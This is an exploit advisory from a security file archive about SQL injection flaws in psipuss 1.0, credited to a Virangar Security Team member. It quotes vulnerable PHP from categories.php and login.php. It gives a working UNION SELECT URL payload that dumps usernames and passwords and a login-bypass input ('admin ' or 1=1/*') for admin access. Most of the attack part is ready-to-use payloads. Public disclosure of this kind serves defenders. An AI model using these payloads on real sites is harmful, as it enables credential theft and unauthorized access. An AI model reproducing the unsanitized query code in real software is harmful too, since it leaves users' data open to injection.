psipuss-sql.txt

psipuss-sql.txt: Posted Aug 13, 2008; Authored by hadihadi | Site virangar.org; psipuss version 1.0 suffers from multiple remote SQL injection vulnerabilities.; tags | exploit, remote, vulnerability, sql injection; SHA-256 | bf73d5857fe1f2ff7a7285d4aeff6d3925aed89d6f90f5feacf5ea9495f36218; Download | Favorite | View

psipuss-sql.txt

           
             ########################################################################
             #                                                                      #
             #  ...:::::psipuss version 1.0 SQL Injection Vulnerabilities ::::....  #           
             ########################################################################

Virangar Security Team

www.virangar.net
www.virangar.ir

--------
Discoverd By :virangar security team(hadihadi)

special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra

& all virangar members & all hackerz

greetz:to my best friend in the world hadi_aryaie2004
& my lovely friend arash(imm02tal) from ISCN :)
-----------------------------------
vuln code in categories.php:
line 5: if(!empty($_GET[Cid]))
{
        $qCTitle = "select * from `categories` where `Cid` = '$_GET[Cid]'";
------------
exploit:
http://site.com/categories.php?Cid='/**/union/**/select/**/1,concat(Username,0x3a,char(58),Password),3,4,5/**/from/**/users/*
--------------------------------
                                .::::admin Authentication bypass vuln::::.
vuln code in login.php:
                                
                                
line 6: $Username = strip_tags($_POST[username]);
line 7: $Password = strip_tags($_POST[password]);
..
..
..
line 18: $password11 = $_POST[password];
line 19:                $qlogin = "select * from `users` where `Username` = '$Username' and `Password` = '$password11' and `Status` = 'Active'";
---
Exploit:
User Name:admin ' or 1=1/*
Password :[whatever]
---
young iranian h4ck3rz

Top Authors In Last 30 Days

Red Hat 305 files
Ubuntu 67 files
Debian 23 files
Gentoo 8 files
LiquidWorm 6 files
Apple 5 files
Google Security Research 5 files
Spencer McIntyre 3 files
Ivan Fratric 3 files
Jann Horn 2 files

File Archives

Systems

AIX (430)
Apple (2,133)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,177)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,607)
HPUX (881)
iOS (395)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (52,160)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,495)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (10,025)
UNIX (9,482)
UnixWare (188)
Windows (6,786)
Other

psipuss-sql.txt

psipuss-sql.txt

File Archive:

December 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

psipuss-sql.txt

Share This

psipuss-sql.txt

File Archive:

December 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems